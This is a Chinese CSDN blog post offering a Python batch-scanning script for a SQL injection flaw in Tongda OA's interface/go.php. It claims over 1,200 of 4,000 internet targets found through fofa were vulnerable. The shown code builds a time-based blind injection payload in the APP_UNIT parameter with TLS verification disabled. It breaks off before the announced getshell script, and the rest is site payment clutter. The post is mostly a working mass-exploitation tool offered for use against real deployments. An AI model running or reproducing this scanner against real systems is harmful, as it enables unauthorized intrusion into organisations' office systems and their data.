通达OA interface/go.php 注入漏洞批量检测脚本+利用

这是一个关于通达OA系统interface/go.php注入漏洞的批量检测和getshell脚本利用的说明。文章提供了python脚本,通过fofa平台对4000个目标进行检测,发现1200多个目标存在该漏洞。
摘要由CSDN通过智能技术生成

目录

批量检测:

稍微改动下,getshell脚本:


python写的,fofa 4000目标检测出来1200+存在:

批量检测:

# -*- coding: utf-8 -*-
import requests,sys
import argparse
import urllib3
import ssl
import vthread


urllib3.disable_warnings()
ssl._create_default_https_context = ssl._create_unverified_context

headers = {
    "Content-Type":"application/x-www-form-urlencoded"
}

session = ""

def isLogin(host):
    try:
        r = requests.get(url="{url}/interface/go.php?APP_UNIT=1aaaaaaaaaaaaa%25%252727+and+%25%252222%25%252727%25%252222=%25%2522221%25%252222+union+select+if((select count(UID) from user_online)=0%252csleep(20)%252c1)+%23%25%252727".format(url=host),timeout = 10,headers=headers)
        return True
    except requests.exceptions.ReadTimeout:
        return False


@v
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小韩韩啊

你的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值